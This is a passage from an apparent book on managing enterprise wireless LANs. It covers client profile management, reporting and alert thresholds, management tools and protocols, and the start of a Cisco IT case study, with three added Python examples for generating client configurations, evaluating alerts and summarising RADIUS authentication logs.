Many manufacturers do not address this challenge and instead rely upon the customer (you!) to handle
it. As mentioned previously, most wireless clients come with specific client software, and some operating
systems provide limited native wireless support. But this situation presents the enterprise with the
unenviable prospect of configuring each make and model of laptop and each operating system on a
case-by-case basis. There are different ways to approach this task, as described in the following sections.

Third-Party Wireless Software


You can adopt third-party wireless client software and install it on every laptop, regardless of the
wireless adaptor or operating system. As mentioned earlier, companies such as Meetinghouse Data
Communications provide universal wireless clients that address this problem. Not only do they support
most common wireless adaptors and operating systems, but they also provide centralized client and
profile management. It is possible to clearly define, distribute, and update profiles for your entire client
population.
The disadvantage of this option is that the third-party client software must be purchased for each
device; that is, the third party usually charges a per-seat licensing fee. Conversely, this system can save
the enterprise money in the long term by reducing the operational overhead of supporting and managing
your various clients.

Centralized Self-Service Model


A centralized self-service model provides your user population with a one-stop shop for their wireless
security settings. Usually a web page where any client device, regardless of operating system, can
connect, this centralized location provides instructions on how to configure common settings or, in some
cases, scripts that can automate the process for the user. This approach avoids the requirement for IT
support staff to "touch" every client device, but it transfers the effort onto your users. Note that this
approach can sometimes result in increased technical support calls to your helpdesk as users
misinterpret instructions or make mistakes configuring their systems. However, it is more cost-effective
and less resource-intensive than having your IT staff visit and configure each device manually.
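The profile concept described above (one named set of SSID, EAP mechanism, and encryption settings per network) and the self-service script it enables can be illustrated with a small example. This is added code, not from the book or from any vendor named in it: the enterprise defines each profile once, checks it against policy, and renders it into a client format that a self-service script could install. wpa_supplicant's network-block syntax is used as the target format; every SSID, certificate path, and profile name below is constructed for illustration.

```python
"""Central WLAN profile definition, policy check, and client rendering.

Added example, not code from the book or from any vendor named in it.
The enterprise defines each profile (SSID, EAP mechanism, encryption)
once, checks it against policy, and renders it into a client format so
a self-service script can install it. wpa_supplicant's network-block
syntax is the target here; every SSID, path and name below is constructed.
"""

# Keys that wpa_supplicant expects unquoted (enumerations and integers).
UNQUOTED_KEYS = {"key_mgmt", "eap", "proto", "pairwise", "group", "priority"}

# Constructed central definitions: one profile per enterprise SSID/VLAN.
BASELINE_PROFILES = {
    "Enterprise WLAN: Finance": {
        "ssid": "corp-finance",                       # constructed SSID
        "proto": "RSN",
        "key_mgmt": "WPA-EAP",
        "eap": "PEAP",
        "phase2": "auth=MSCHAPV2",
        "ca_cert": "/etc/ssl/certs/corp-ca.pem",      # placeholder path
        "priority": 10,
    },
    "Enterprise WLAN: Manufacturing": {
        "ssid": "corp-mfg",                           # constructed SSID
        "proto": "RSN",
        "key_mgmt": "WPA-EAP",
        "eap": "TLS",
        "ca_cert": "/etc/ssl/certs/corp-ca.pem",      # placeholder path
        "client_cert": "/etc/ssl/certs/client.pem",   # placeholder path
        "private_key": "/etc/ssl/private/client.key", # placeholder path
        "priority": 10,
    },
}


def validate_profile(name, profile):
    """Return policy violations for one profile; an empty list means it passes."""
    problems = []
    for key in ("ssid", "key_mgmt"):
        if key not in profile:
            problems.append(f"{name}: missing {key}")
    if profile.get("key_mgmt") == "WPA-EAP":
        if "eap" not in profile:
            problems.append(f"{name}: EAP profile without an EAP method")
        if "ca_cert" not in profile:
            # Without a CA anchor the client cannot verify it is talking to
            # the enterprise authentication server.
            problems.append(f"{name}: EAP profile does not validate the server certificate")
    if "wep_key0" in profile or profile.get("key_mgmt") == "NONE":
        problems.append(f"{name}: open or static-WEP settings are not an enterprise posture")
    return problems


def render_profile(name, profile):
    """Render one profile as a wpa_supplicant network block."""
    lines = [f"# {name}", "network={"]
    for key, value in profile.items():
        if key in UNQUOTED_KEYS:
            lines.append(f"    {key}={value}")
        else:
            lines.append(f'    {key}="{value}"')
    lines.append("}")
    return "\n".join(lines)


def build_client_config(profiles):
    """Validate every profile, then render the whole set; raise on any policy failure."""
    problems = [p for name, prof in profiles.items() for p in validate_profile(name, prof)]
    if problems:
        raise ValueError("; ".join(problems))
    return "\n\n".join(render_profile(n, p) for n, p in profiles.items())


if __name__ == "__main__":
    print(build_client_config(BASELINE_PROFILES))
```

The policy check is the part worth keeping whatever the target format: an EAP profile pushed to thousands of clients without a CA anchor leaves every one of them unable to tell the enterprise authentication server from any other, so the central definition is the right place to refuse it.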

Standardization
Standardizing on a single client hardware platform will often provide the enterprise with a method of
client security management. Some wireless adaptor and laptop manufacturers provide wireless client
software with their systems. If you can standardize on such a system (be it a laptop or operating
system), you might be able to use some basic centralized client management features to create and
manage profiles.

Manual Process
Manually configuring clients for WLAN security settings is the least attractive and most expensive option.
Indeed, it is really a "do nothing" approach. You leave it entirely up to your end users to configure their
clients, whatever the client may be. The IT support staff simply publish or communicate the settings
(EAP mechanism, SSID, and encryption protocol) used for the enterprise WLAN, and the users configure
their own devices.
In some circumstances, you might need to have a manual process in addition to one of the previously
described options simply because a particular client device has no management features. ASDs
(such as bar-code readers or wireless-enabled manufacturing equipment), for example, must be
manually configured by your IT support staff. As such, manual configuration is a costly but sometimes
unavoidable option.

WLAN Reporting and Alerting


To successfully manage any network, timely and accurate information is required. Not only is current
and up-to-date information necessary (that is, "snapshots" of the WLAN in its current state), but also
historical reporting capabilities are required to help identify trends. Additionally, alerting capabilities are
important. WLAN reporting includes three related areas, as described in the following sections:
Standard/systematic reports
Trend reports
Alerts

Standard/Systematic Reports
Standard/systematic reports are the standard set of reports that your network management toolset can
generate on a regular basis. They are often called canned reports because they report upon common
queries. Your IT staff can run these reports when needed or on a regular basis, such as daily, weekly, or
monthly. These reports tend to be repeatable, with their reporting criteria remaining static.
Some examples include reports on the make, model, or configuration of access points in your wireless
network, the number of access points in a particular region or theater, a snapshot report on the number
of clients associated to a particular access point, the top ten traffic-generating clients or access points,
and so on.
The following list includes more detailed possibilities for sample standard reports:
Detailed status
Associations
QoS details
Security settings
Per VLAN clients
Host name/IP address/MAC address/serial number
Power status
RADIUS authentications
Per VLAN Client report
EAP/MAC failed authentication
Failed authentication
AP memory utilization
AP CPU utilization
AP packet statistics
AP packet errors
AP radio utilization
Associated clients statistics
Ethernet interface utilization
Uptime

Note
Although it is impossible to list all aspects of WLAN reporting, the lists in these sections include
some areas that you might want your WLAN management toolset or framework to monitor.
These lists should not be considered exclusive or comprehensive but rather indicative of the
kinds of reporting metrics. Values listed in the reports are examples only.

Trending
Trending reports are similar to standard reports, but they present the information over a period of time
instead of as a snapshot. They are often presented in graphical format, showing how the reported
characteristic has changed over a particular period, such as the maximum number of associated or
authenticated clients on a particular access point, the CPU utilization of an access point, the interface
utilization on a particular port, and so on. As their name implies, trending reports identify trends and
help ensure that your IT department can proactively plan capacity, upgrade, reconfigure, or fine-tune
the network as the environment evolves and user behavior and network utilization change.
The following list includes sample parameters for trending reports:
Group of access points
- RF utilization
- Ethernet utilization
- Number of associations
- Number of authentications
- Number of failed authentications
- Maximum client associations
- Maximum client associations graph
- Maximum percentage errors
Single access point
- RF transmission statistics
- Ethernet transmission statistics
- RF and Ethernet utilization graph
- RF and Ethernet utilization table
- Top N busiest clients
- Top N client error rate

Alerts
Alerting is the capability to generate alarms when certain criteria are met. Alerts are useful to identify
and remedy undesirable events. They enable reactive action on the part of your IT staff. When an alarm
is created and your network management framework has been alerted, IT staff can correct (or in some
circumstances, simply acknowledge) the problem.
Examples of common alerts include notification when the CPU utilization of an access point reaches 80
percent or higher, when the number of associated clients peaks above 20 users or devices, and when
channel utilization is above 85 percent. They are excellent indicators of complications on the network
and are often used to help direct the attention of your IT staff to problem areas, often before the user
population realizes or experiences difficulties.
The following list includes more detailed possibilities for alerts:
Access point
- Do not broadcast SSID
- SNMP reachable
- CPU utilization above 60 percent
- CPU utilization above 80 percent
- Memory utilization above 60 percent
- Memory utilization above 80 percent
Ethernet interface
- Ethernet port status
- Ethernet port utilization above 60 percent
- Ethernet port utilization above 80 percent
Radio interface
- RF port status down
- RF port utilization above 30 percent
- RF port utilization above 40 percent
- RF port packet errors above 10 percent
- RF port packet errors above 20 percent
- RF port WEP errors above 10 percent
- Max retry count 60 to 90 per interval
- Max retry count above 90 per interval
- Associated client count 15 to 30 per AP
- Associated client count above 30 per AP
- Associating rate 60 to 90 per poll
- Associating rate above 90 per poll
- Authentication rate 60 to 90 per poll
- Authentication rate above 90 per poll
- Interference detection (if possible)
Network/radio policies
- Rogue AP detection (if possible)
- Ad-hoc network detection (if possible)
- Detection of 100 association requests over 15 minutes
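The trending and alerting ideas of the last two sections come together in the following added example, which is not from the book or from any management product it names. It applies the warning and critical thresholds listed above to constructed poll samples for an access point, keeps a sliding window that implements "100 association requests over 15 minutes", and reduces a series of samples to a per-day maximum of the kind a trending report would plot. Timestamps are plain seconds (as a poller would record them); the AP names and counter values are constructed.

```python
"""Threshold alerting and trend aggregation over polled AP counters.

Added example, not from the book or any vendor tool it names. It applies
the warning/critical thresholds listed in this section to constructed
poll samples, keeps a 15-minute sliding window of association requests,
and reduces a series of samples to a daily maximum for trending.
Timestamps are seconds since the epoch, as a poller would record them.
"""
from collections import defaultdict, deque

# metric -> (warning, critical). Percentages or counts per poll/interval,
# taken from the alert list above: a value above the critical figure is
# critical; from the warning figure up to the critical figure is a warning.
THRESHOLDS = {
    "cpu_pct": (60, 80),
    "mem_pct": (60, 80),
    "eth_util_pct": (60, 80),
    "rf_util_pct": (30, 40),
    "rf_pkt_err_pct": (10, 20),
    "max_retry": (60, 90),
    "assoc_clients": (15, 30),
    "assoc_rate": (60, 90),
    "auth_rate": (60, 90),
}


def evaluate_sample(ap, sample):
    """Return (ap, metric, severity, value) tuples for one poll of one AP."""
    alerts = []
    # Status checks: unreachable management plane, radio down, SSID broadcast on.
    if not sample.get("snmp_reachable", True):
        alerts.append((ap, "snmp_reachable", "critical", False))
    if not sample.get("rf_port_up", True):
        alerts.append((ap, "rf_port_status", "critical", False))
    if sample.get("ssid_broadcast", False):
        alerts.append((ap, "ssid_broadcast", "warning", True))
    # Numeric thresholds.
    for metric, (warn, crit) in THRESHOLDS.items():
        if metric not in sample:
            continue
        value = sample[metric]
        if value > crit:
            alerts.append((ap, metric, "critical", value))
        elif value >= warn:
            alerts.append((ap, metric, "warning", value))
    return alerts


class AssociationWindow:
    """Sliding window implementing 'N association requests over 15 minutes'.

    Events are assumed to arrive in time order (seconds since the epoch).
    """

    def __init__(self, limit=100, span_seconds=15 * 60):
        self.limit, self.span = limit, span_seconds
        self.events = deque()

    def add(self, when):
        """Record one association request; True when the window holds >= limit."""
        self.events.append(when)
        while self.events and when - self.events[0] > self.span:
            self.events.popleft()
        return len(self.events) >= self.limit

    def count(self):
        return len(self.events)


def daily_max(samples, metric):
    """Trend reduction: [(timestamp, sample), ...] -> {day_index: max of metric}."""
    out = defaultdict(int)
    for when, sample in samples:
        day = int(when // 86400)  # UTC day index from epoch seconds
        out[day] = max(out[day], sample.get(metric, 0))
    return dict(out)


if __name__ == "__main__":
    # Constructed poll: busy CPU, slightly high radio utilisation.
    for alert in evaluate_sample("ap-01", {"cpu_pct": 85, "rf_util_pct": 35, "assoc_clients": 12}):
        print(alert)
```

Two design points carry over to any real toolset: the status checks (reachability, radio port, SSID broadcast) are evaluated before the numeric ones, because a sample from an unreachable device has no trustworthy counters, and the association window prunes by time on every insert rather than on a timer, so it costs nothing between bursts.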

Management Tools
You have many options for adopting a toolset for WLAN management. A robust WLAN management
strategy is just as important as the actual tools used. So far in the chapter, you have learned about the
various areas and topics that such a strategy should encompass. Now let us consider the actual tools
that can help implement such a strategy.

Vendor-Specific WLAN Management Tools


Most enterprise-class wireless network solutions provide some native management features. These are
often a combination of support for open management standards and dedicated network management
products or appliances.
Dedicated, vendor-specific management systems are an important part of any robust WLAN
management framework. Such tools are typically worth the price. The added functionality and
management capabilities they provide not only help decrease the support burden on your IT staff (and
thus decrease the cost), but they also assist in providing dedicated and specific management and
reporting capabilities that are closely tied to the vendor's equipment. In effect, they are tailor-made to
monitor, manage, and report upon the particular vendor's equipment.
Such tools typically come with canned reports that will reduce the need for your team to define their
own. In some circumstances, they can be fully or partly integrated with existing management
frameworks, avoiding isolation and the use of standalone management tools for the WLAN. Vendor-specific management systems provide such features as
RF management
Rogue AP detection
Host management
Configuration management
Image management
Interference detection
Wireless intrusion detection
Wireless planning and optimization
Examples of vendor-specific management systems include the following:
Cisco Wireless LAN Solution Engine (WLSE)
Cisco Wireless Control Software (WCS)
Aruba RF Director
Symbol Mobility Services Platform (MSP)
Trapeze Networks RingMaster

Third-Party WLAN Management Tools


Several independent, nonvendor-specific tools are available that provide enterprises with dedicated
wireless tools. Typically these concentrate on WLAN network analysis, reporting, and sniffing. They are
used to monitor the WLAN, capture and analyze traffic, and provide detailed information about the RF
environment. As such, they can be used for rogue AP detection, interference detection, traffic analysis,
security analysis, site surveying and planning, and troubleshooting activities. They do not manage the
infrastructure and cannot be used to configure WLAN controllers or switches.
Examples of third-party WLAN management tools include the following:
AirMagnet
AiroPeek
Sniffer Pro Wireless
Thales Air Defence
Wireless Valley LANPlanner
Helium Networks SiteScout and SiteSense
Fluke Networks EtherScope and OptiView network analyzers

Common Network Management Platforms


Most large enterprise customers will already have an existing network management system in place,
usually for their wired network and associated services and applications. In many circumstances, these
can be extended to provide a modicum of wireless management, such as host monitoring and reporting
of device status. They tend to not provide wireless-specific reporting and usually only monitor up to the
access point. In effect, they are blind to the wireless side of the access point.
However, in some circumstances, these tools are sufficient to address many of your basic needs. These tools
will certainly provide reporting and alerting on the status of the access points and various WLAN
controllers and management appliances (if you have deployed these). Finally, most vendor-specific tools
can be integrated with common network management platforms. This capability allows the enterprise to
continue to use the common network management platform as its primary toolset; the vendor-specific
WLAN management tools can be launched directly from the common network management application.
Examples of network management platforms include the following:
CA Unicenter
Cabletron Spectrum
Tivoli TME 10
IBM NetView
SunNet Manager/Solstice
CiscoWorks
HP Network Node Manager
BMC Software Inc. PATROL Visualis

Common Network Management Protocols


Many cross-technology, network-based management tools and standards can be used or leveraged in
managing WLANs. You will perhaps find that some of these, such as SNMP (Simple Network
Management Protocol), are already in use within your enterprise. Others, such as syslog or NetFlow, can
depend upon your environment. These protocols are often leveraged by existing network management
systems and in-house developed tools and scripts.

SNMP
SNMP is the open Internet standard for collecting network management information on TCP/IP networks
and is defined by IETF RFC 1157. It can also be used to configure certain settings.

Note
You can find all RFCs online at http://www.ietf.org/rfc.html, where you can search by RFC
number. If you do not know the RFC number, you can find it at the IETF RFC index at
http://www.ietf.org/iesg/1rfc_index.txt.

SNMP uses Management Information Bases (MIB) that define what information is available and what
settings can be made. Each device will have a MIB that provides this data. The network management
tool can then use SNMP to collect the information or make the changes that the MIB allows.
SNMP is very rarely used manually. It is a protocol for other tools and scripts. You will find that almost
all network management tools and applications use SNMP in some way, even if it is hidden from the IT
support professional.
SNMP is useful because it can also be used by custom-written tools and scripts that your IT support staff
can develop. If these skills do not exist in-house, then it is advised not to manually manipulate SNMP
settings on your network hardware.

Syslog
Syslog is a distributed logging service. Originally written for the UNIX operating system, it is now
common on many network infrastructure devices and systems. Unlike SNMP, which can be used to
change settings or configure systems, syslog is a "one-way" protocol. It simply sends logging
information to a syslog recorder. This recorder can then be used to review and analyze the logs. Syslog
is a useful tool for collecting information, but it is not as robust as SNMP and could be considered an
alternative if no SNMP skills exist within your organization but your staff is familiar with this protocol
instead.

NetFlow
NetFlow is a Cisco standard for capturing and analyzing network traffic. It is typically used in large
enterprises for accounting, network planning and analysis, monitoring (including application monitoring),
and user traffic analysis. It does not normally form part of an everyday wireless network management
toolset, but it is useful if your IT support staff need to review traffic patterns or troubleshoot esoteric or
hard-to-define problems. NetFlow also forms the basis of the upcoming IETF IPFIX standard, which you
can learn more about at http://www.ietf.org/html.charters/ipfix-charter.html.

RADIUS Accounting
AAA servers, by their very nature, provide accounting information on users being authenticated on the
network. Most enterprise WLANs will require users to provide credentials and passwords before gaining
access; the user must log on before using the network. Accounting information and AAA server reports
can therefore be useful in helping your IT support staff optimize the network.
By analyzing AAA and RADIUS reports, you can sometimes identify problems that might have otherwise
been difficult to discover. For example, multiple logon failures can point to a problem with a user's
credentials, timeouts for all users at a particular location can point to a WAN congestion, and so on. So
although RADIUS accounting and AAA reporting are not management tools in themselves, the visibility
they offer into the "backend" processes can often help in troubleshooting and fine-tuning your network.
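The two symptoms just mentioned, repeated logon failures for one user and timeouts for everyone behind one site, can be pulled out of authentication records with a short script. The following is an added example, not from the book or from any AAA product: the record format is constructed (one line per attempt with a timestamp, NAS identifier, user, and outcome), and a real server's log would be mapped onto the same four fields before feeding it in.

```python
"""Mining RADIUS authentication records for client and site problems.

Added example, not from the book or from any AAA product. The record
format is constructed (one line per attempt: timestamp, NAS identifier,
user, outcome); a real server's accounting or auth log would be mapped
to the same fields. It flags users with repeated rejects (likely a
credential problem) and NAS devices where most attempts time out
(likely a path or WAN problem between that site and the AAA server).
"""
from collections import defaultdict

# Constructed sample records: "<epoch> nas=<id> user=<name> result=<Accept|Reject|Timeout>"
SAMPLE_LOG = """\
1147770000 nas=ap-ldn-01 user=jsmith result=Reject
1147770030 nas=ap-ldn-01 user=jsmith result=Reject
1147770060 nas=ap-ldn-01 user=jsmith result=Reject
1147770090 nas=ap-ldn-02 user=amurphy result=Accept
1147770100 nas=ap-sfo-07 user=bchen result=Timeout
1147770110 nas=ap-sfo-07 user=dpatel result=Timeout
1147770120 nas=ap-sfo-07 user=ekim result=Accept
1147770130 nas=ap-sfo-07 user=fgarcia result=Timeout
1147770140 nas=ap-ldn-02 user=amurphy result=Accept
"""


def parse_record(line):
    """Turn one record into a dict; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 4 or not parts[0].isdigit():
        return None
    rec = {"ts": int(parts[0])}
    for field in parts[1:]:
        key, _, value = field.partition("=")
        if key not in ("nas", "user", "result") or not value:
            return None
        rec[key] = value
    return rec if len(rec) == 4 else None


def summarize(log_text, reject_limit=3, timeout_ratio=0.5):
    """Count rejects per user and outcomes per NAS, then flag what deserves a look."""
    rejects = defaultdict(int)
    per_nas = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue  # skip lines that do not fit the expected shape
        per_nas[rec["nas"]][rec["result"]] += 1
        if rec["result"] == "Reject":
            rejects[rec["user"]] += 1
    # A user rejected reject_limit times or more probably has a credential problem.
    flagged_users = sorted(u for u, n in rejects.items() if n >= reject_limit)
    # A NAS where at least timeout_ratio of attempts time out points at the
    # path between that site and the AAA server rather than at any one user.
    flagged_nas = sorted(
        nas for nas, counts in per_nas.items()
        if counts.get("Timeout", 0) / sum(counts.values()) >= timeout_ratio
    )
    return {
        "rejects_by_user": dict(rejects),
        "outcomes_by_nas": {n: dict(c) for n, c in per_nas.items()},
        "users_to_check": flagged_users,
        "nas_to_check": flagged_nas,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Separating the two flags matters for the helpdesk: the per-user count sends a reject pattern to whoever resets credentials, while the per-NAS ratio sends a timeout pattern to the network team, since no amount of password resets fixes a congested WAN link.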

IP Traffic and Analysis Features in Network Equipment


Most network equipment provides varying degrees of "built-in" traffic analysis and reporting tools.
Network routers and switches can be configured to collect data on traffic they handle. Statistics on IP
packets and interface utilization can be generated. Each equipment vendor provides different methods of
enabling these features.
This additional data can help in many ways, including capacity planning, fault identification, and
resolution or simple troubleshooting.

Internally Developed Tools


Internally developed tools are those that are created by your IT support staff, usually using scripting and
programming languages, that are specific to your enterprise. Because these tools are unique to each
environment, there are few guidelines that can be offered. Some enterprises develop tools internally to
plug gaps in their management framework. These tools could be automated access point configuration
utilities that leverage a scripting language and the AP command-line interface to log on to the device and
update settings, up to customized utilities that update or reconfigure client devices. They are often
developed to leverage common network management tools and standards such as SNMP or syslog (for
reporting).

Summary
Managing your wireless network falls under both the operating and optimizing phases of the solutions
lifecycle. It is an ongoing effort that will help ensure the success of your WLAN.
When defining your management strategy, one of the first decisions you should make is whether to
handle support in-house or to outsource this activity to a trusted partner. You can use the FCAPS model
to help define your management strategy. The underlying architecture of your network will help guide
you when considering centralized WLAN management versus a distributed model. Centralized WLAN
management avoids having to configure and manage each access point but usually requires dedicated
WLAN controllers or switches.
There are three common topics when considering WLAN management. You must be able to manage the
RF portions of your WLAN, you must be able to manage the physical infrastructure or hosts, and you
must also consider client management, which is often the most challenging aspect of all.
WLANs, by their very nature, are more difficult to manage than regular wired networks. Client devices on
a WLAN are constantly on the move, create more load on your AAA as they repeatedly authenticate and
reauthenticate, and are not as predictable in their location as normal wired network clients such as
desktop computers. WLANs are also based upon radio frequency technologies, and radio is a very
dynamic and constantly changing medium, subject to interference, contention, and environmental
factors.
Another important topic that you should not overlook is managing the security framework of your WLAN.
Because WLANs transmit their traffic via radio waves, you must ensure that you have a strong security
architecture to maintain the integrity of your network and the data on it. Do not overlook security
management because this is an area where you will most likely need to regularly audit, fine-tune, and
revise.
You can address all these challenges with a robust management framework and tools. Many options are
available to you, including those provided by the manufacturers of the equipment you installed all the
way to independent third-party solutions that you can purchase and integrate with existing systems you
might already have. Finally, do not overlook the possibility of using dedicated wireless diagnostic tools
for your IT staff and even developing some tools and utilities in-house if you have the technical
resources available.

Chapter 9. Enterprise Case Study

In 2000, Cisco information technology (IT) began developing a consistent and supported global wireless
networking architecture. During this process, IT recognized a growing number of non-IT deployments
throughout the company, led by user demand for the benefits offered by wireless networking. These
WLANs were purchased, deployed, and supported by local teams without IT support or supervision. This
situation resulted in many inconsistent "gray IT" deployments, often with poor security and sometimes
involving ready-to-use wireless solutions with no security. Most of these "DIY" networks used Cisco
Aironet access points, but wireless products from other manufacturers were also identified. Even when
the same products were used, software versions and configurations were often different.

Business Model
The business model for deploying enterprise-class WLANs in the Cisco internal environment was based
upon two underlying fundamentals:
The desire to embrace and showcase new technology where Cisco Systems led the industry
The realization of the real and measurable benefits that wireless networks would provide to the
Cisco global workforce, a workforce that was already partly "mobilized" by the provision of laptops
to all staff

Defining the Business Case


The issue for Cisco IT was not whether WLANs should be deployed, because Cisco Systems had long
since identified the many benefits offered by the technology, but rather determining how to cost-effectively maintain control, reduce overall support costs, ensure a secure wireless infrastructure, and
still provide benefits to Cisco employees. The project team realized that WLANs would deliver
productivity benefits. Additionally, Cisco already had a highly mobile workforce where almost every
employee (in excess of 37,000) was issued a laptop computer. Most onsite vendors and contractors
were also similarly equipped.
Potential mobility (and therefore additional productivity) was limited, however, because of one simple
fact: Laptop users (indeed, all users) were "tethered" to their desks by the traditional Ethernet cable. This
simple fact alone negatively impacted the vast potential benefit that user mobility offered to the
corporation.

The Strategic Value


The strategic value of wireless networking was characterized by five guiding principles:
Business value: WLANs should be productivity tools, enabling greater mobility for Cisco
employees.
Comprehensive entitlement: Each Cisco employee, regardless of position, should have access to
the global wireless network.
Ubiquitous coverage: The WLANs should be built on global, scalable standards to provide a single,
worldwide wireless network.
Security: IT had to design a secure architecture that did not rely upon the then-prevalent, yet
insecure, static Wired Equivalent Privacy (WEP) shared-key framework.
Ease of use: User friendliness and a common user experience across all Cisco sites were essential
for widespread adoption.
Cisco IT identified additional security principles, including these:
WLANs should support both privacy and access control through enterprise-class authentication and
encryption capabilities.
Network attacks must be mitigated.
Rogue access points must be detected and remediated.

Technology Considerations
The selection of a suitable WLAN technology was an easy one. As the world's leader in the manufacture
of enterprise-class WLAN equipment, Cisco did not have difficulty in choosing the products to deploy.
Cisco did, however, need to define, deploy, and provision a robust end-to-end solution.

Architecture Principles
When considering the architecture of your WLAN, your assessment must encompass many points. This
section examines some of the factors that affected the enterprise WLAN deployment at Cisco Systems,
as follows:
Topology
802.11 wireless networking standards
Client-to-AP ratio
Signal strength
Roaming
Radio cell architecture
Global naming standards
Cisco Aironet access points
Cisco Secure Access Control Server (ACS)

Topology
Early in the planning stage, the Cisco IT WLAN Architecture team decided that the WLAN would be a
secondary network complementing the existing wired network (that is, a separate "overlay" network).
Each large building used a single Layer 3 domain to help ensure session integrity for wireless devices
moving within or between floors. Effectively, each building had a unique
wireless subnet, where both the access points and the wireless devices shared IP addresses from a
common Class C address pool. However, in line with prudent IP address management, smaller buildings
with fewer than 20 or 30 users shared a common VLAN for both wired and wireless devices.
Additionally, at the time of deployment, the Cisco Aironet product line was based solely on a distributed,
autonomous access point (or so-called "Intelligent AP") model. Each access point was a unique,
managed host with full intelligence and configurability. As such, the current global WLAN is a distributed
model with over 3000 intelligent IOS access points in production. Figure 9-1 shows a basic topological
diagram of the initial enterprise WLAN. The access points are connected directly to standard Layer 2
switches, and network management is provided by the Wireless LAN Solution Engine (WLSE) and the
internally developed Enterprise Management (EMAN) toolset.

Figure 9-1. Basic Topology of the Cisco Enterprise WLAN

In 2000, the architecture standard called for Cisco Aironet 350 Series access points to be connected to
the nearest access-layer switch, as shown in Figure 9-2. A separate cable provides console access to
each access point to mitigate a loss of network connectivity, a practice that Cisco IT has standardized for
all network devices. The console network is used for out-of-band (OOB) network management,
configuration, and troubleshooting. Figure 9-2 shows how each access point is connected to the
production data network and via a separate cable to the console network.

Figure 9-2. Access Points Connected to Production Data Network and Console Network

Because of ongoing developments in WLAN technologies, Cisco decided to redesign its enterprise
wireless network in 2005. This project, known internally as the NexGen WLAN, will feature a combination
of autonomous (IOS-based) access points and new centrally managed (LWAPP-based) access points,
controlled and managed by WLAN controllers. Further information on the Cisco IT strategy can be found
in the section "What the Future Holds " later in this chapter.

Note

Lightweight Access Point Protocol (LWAPP) is a protocol that allows WLAN controllers to configure and manage
access points in the Cisco Centralized WLAN Solution. LWAPP introduces a split MAC, which allows the real-time
portions of MAC management to be accomplished within the access point, while WLAN controllers
handle authentication, security management, and mobility.

More detailed information on LWAPP and the Cisco Centralized WLAN Solution can be found at
http://www.cisco.com/en/US/netsol/ns340/ns394/ns348/ns337/networking_solutions_white_paper0900aecd
or by going to Cisco.com and searching for "Understanding the Lightweight Access Point Protocol (LWAPP)."

802.11 Wireless Networking Standards


At the time that the architecture team was designing the global WLAN, the only ratified standard was
802.11b, providing raw data rates of up to 11 Mbps in the 2.4-GHz frequency range. Therefore, this
standard was adopted for the global enterprise wireless network.
Based upon internal Cisco IT policies and procedures, new products and standards must first undergo
prudent and comprehensive testing and certification before they are used in the production environment.
Shortly after ratification, the 802.11g standard was internally certified for use within Cisco by the
architecture team. Today, therefore, Cisco is deploying 802.11g Cisco Aironet access points and client
devices in its WLANs. 802.11g was selected over 802.11a because it also works in the 2.4-GHz
frequency band and therefore offers seamless backward compatibility with the existing 802.11b network.
Apart from limited lab and showcase sites, the 802.11a standard was not deployed in a widespread
manner, but it will form part of the NexGen WLAN that is currently being designed by the architecture
team; see the "What the Future Holds " section for more details.
Although 802.11g supports data rates of up to 54 Mbps in the 2.4-GHz band, these higher speeds are
only available to 802.11g clients. Furthermore, 802.11g access points "step down" their speed when
older 802.11b clients are associated to ensure backward compatibility. As such, it is not uncommon to
find many 802.11g access points working at a maximum of 11 Mbps (effectively in 802.11b, or "legacy"
mode). Such circumstances will decrease as the number of older 802.11b clients diminishes in line with
the introduction of new laptops and replacement of the older devices.

Client-to-AP Ratio
After careful traffic analysis, Cisco IT built its architecture on the assumption that a user-to-AP ratio of
25:1 would provide acceptable performance. At that time (early 2000), it was deemed unlikely that all 25 users would be
accessing the WLAN at the same time and even more unlikely that they would all be simultaneously
sending or receiving large amounts of data. Because the WLAN was an overlay network, those users who
needed to use bandwidth-intensive applications such as network backups or video streaming were
encouraged to use the wired network and not depend on the wireless network for these functions.
However, Cisco IT has found that adoption has been extremely high. Within 12 months of deployment,
Cisco IT commissioned an internal "Voice of the Client" survey, which showed that 92 percent of staff
were using the WLAN on a weekly basis; furthermore, 27 percent of users were relying upon the WLAN
as their "primary or only network access medium." Even with the limitation of the 802.11b data rate of
11 Mbps (or actual throughput of 6 Mbps), day-to-day performance has not been adversely affected and
is deemed perfectly acceptable for the vast majority of user activity. Comments from users have been
overwhelmingly positive.
Some Cisco buildings use wireless connectivity almost exclusively. This includes network backups,
software downloads, video unicast, and Cisco IP Communicator (a software-based IP phone), in addition
to standard web browsing, e-mail, and calendars. Rich Gore, Cisco IT project manager, says, "With
quality of service now supported over wireless, I've been taking all my phone calls over the wireless
network using Cisco IP Communicator, and it's been working perfectly."

Note
Users always have the option of manually connecting their laptops to the wired network if they
so wish, but this practice is by no means standard for most users.

Moving forward, a lower user-to-AP ratio (approximately 12:1) has been recommended as reliance upon
the WLAN increases and adoption has proven to be widespread. This topic is covered in more detail in
the "What the Future Holds " section later in this chapter.

Signal Strength
Cisco Aironet access points can broadcast up to 100mW (depending on the regulatory domain). When
such high transmission power is used, it is possible for the WLAN coverage to extend beyond the
originally desired areas, potentially reaching out into parking lots and public areas. After conducting
tests, the architecture team established standards that call for using the minimum power to reach all
areas within buildings, but never exceeding 20mW. That is, the "less is best" approach is taken. Access
points are ideally configured to use 1mW, 2mW, 5mW, and so on, but never more than 20mW.
In some instances, directional antennas have been used to more narrowly focus the signal, reducing the
power required to achieve full coverage. Where necessary, rather than increasing transmit power to
exceed 20mW, additional access points are installed to cover "dead" spots.

Roaming
To more accurately control roaming, the WLAN client software (in this case, the Cisco Aironet Client
Utility [ACU]) was configured to roam only under certain circumstances, that is, when the current signal
strength has dropped below a specified threshold or the number of retries has exceeded a limit. This
configuration reduces the tendency to reassociate to a new access point and helps avoid flip-flopping.
Each time the user switches from one access point to another, connectivity is momentarily lost,
necessitating reauthentication. Numerous reauthentication requests can increase load on the
authentication server, which can adversely affect service. This situation can be particularly notable in
wireless voice applications, with clearly discernable "stutter" as the client reassociates and authenticates.

Radio Cell Architecture


If cells overlap too much, continual switching ("flip-flopping") is possible. Cisco adopted an overlap of
about 15 percent (roughly 10 feet in most buildings) to minimize this possibility.
As we mentioned in Chapter 5 , the 802.11 standard allows for devices to connect at various data rates
depending on the RF environment. To minimize this effect, the architecture team locked the data rate at
11 Mbps. Thus, the user's wireless connection will never "step down" but rather will associate to a
different access point when it is far enough away from the original access point. This solution controls
